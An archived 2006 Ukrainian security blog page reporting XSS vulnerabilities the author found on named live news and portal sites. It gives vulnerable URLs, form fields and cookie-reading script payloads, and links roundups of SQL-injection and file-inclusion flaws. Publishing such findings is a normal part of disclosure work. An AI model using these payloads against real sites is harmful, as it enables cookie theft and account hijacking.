Архів для категорії 'Уразливості'

Уразливість на 3dnews.ru

01:15 06.08.2006

04.08.2006

Вчора знайшов Cross-Site Scripting уразливість на популярному проекті http://3dnews.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

06.08.2006

Cross-Site Scripting уразливість в двох параметрах програми пошуку на http://market.3dnews.ru.

XSS:

Уразливості досі не виправлені.

Добірка уразливостей

00:29 06.08.2006

В даній добірці уразливості в веб додатках:

Уразливість на www.cnews.ru

01:15 05.08.2006

03.08.2006

Два дні тому знайшов Cross-Site Scripting уразливість на популярному проекті http://www.cnews.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

05.08.2006

XSS:

На сторінці http://www.cnews.ru/subscribe.shtml в полі “Имя: (псевдоним)”.

При подачі POST запиту можливий XSS-напад:
<script>alert(document.cookie)</script>

Добірка уразливостей

00:33 05.08.2006

В даній добірці уразливості в веб додатках:

Уразливість на www.metalweb.ru

20:48 04.08.2006

На минулому тижні знайшов Cross-Site Scripting уразливість на http://www.metalweb.ru. Про що повідомив адміністрації проекту.

XSS:

Уразливості на startua.com та online.ua

01:50 04.08.2006

02.08.2006

Після знайдення уразливості на online.ua, я знайшов знайшов декілька нових Cross-Site Scripting уразливостей на веб сайтах http://startua.com та http://online.ua (обидва бренди належать одному веб проекту). Про що найближчим часом повідомлю адміністрацію даних сайтів. Нудьгувати їм не доведеться :-)

Детальна інформація про уразливість з’явиться пізніше.

04.08.2006

Уразливості:

  • XSS уразливість на startua.com та online.ua

http://perevod.startua.com
http://pereklad.online.ua

При подачі POST запиту можливий XSS-напад:
</textarea><script>alert(document.cookie)</script>

  • XSS уразливість на startua.com

http://www.startua.com/mlist/ml.asp

При подачі POST запиту можливий XSS-напад:
12345@12345.com<script>alert(document.cookie)</script>

Добірка уразливостей

01:24 04.08.2006

В даній добірці уразливості в веб додатках:

Численні уразливості в Mozilla / Firefox / Seamonkey / Thunderbird

23:27 03.08.2006

28.07.2006

Нещодавно знайдені численні уразливості в Mozilla, Firefox, Seamonkey та Thunderbird дозволяють виконання коду без будь-яких обмежень і можуть бути використані для прихованої установки шкідливого коду.

По матеріалам http://www.security.nnov.ru.

02.08.2006

Додаткова інформація:

  • Множественные уязвимости в Mozilla Firefox (деталі)

03.08.2006

Додаткова інформація:

  • Netscape/K-Meleon/Flock JavaScript navigator Vulnerability (деталі)

P.S.

Планую викласти експлоіти для даних уразливостей ;-)

Уразливості на www.internetua.com

20:50 03.08.2006

01.08.2006

Вчора знайшов дві Cross-Site Scripting уразливості на сайті відомого журналу http://www.internetua.com. Про що найближчим часом повідомлю адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

03.08.2006

Перша уразливість.

XSS:

Друга уразливість.

XSS:

POST запит на сторінці http://mail.internetua.com/go/password.php:

<script>alert(document.cookie)</script>В полі: username.

Добірка уразливостей

02:12 03.08.2006

В даній добірці уразливості в веб додатках:

  • PrinceClan Chess Mambo Com <= 0.8 Remote Inclusion Vulnerability (деталі)
  • cpanel login problem (деталі)
  • Guestbook Mambo Module <== v1.3.0 Multiple Remote File Include Vulnerabilities (деталі)
  • PHP-Nuke INP XSS (деталі)
  • Remote Include Vulnerability ====> in Dr.Jr7 Gallery 3.2 RC1 (деталі)
  • Ruperts News Script SQL Injection Vulnerability (деталі)
  • HB-NS Multiple XSS and SQL Injection Vulnerabilities (деталі)
  • AZNEWS SQL Injection Vulnerability (деталі)
  • warforge.NEWS SQL Injection and Multiple XSS Vulnerabilities (деталі)
  • RateIt SQL Injection Vulnerability (деталі)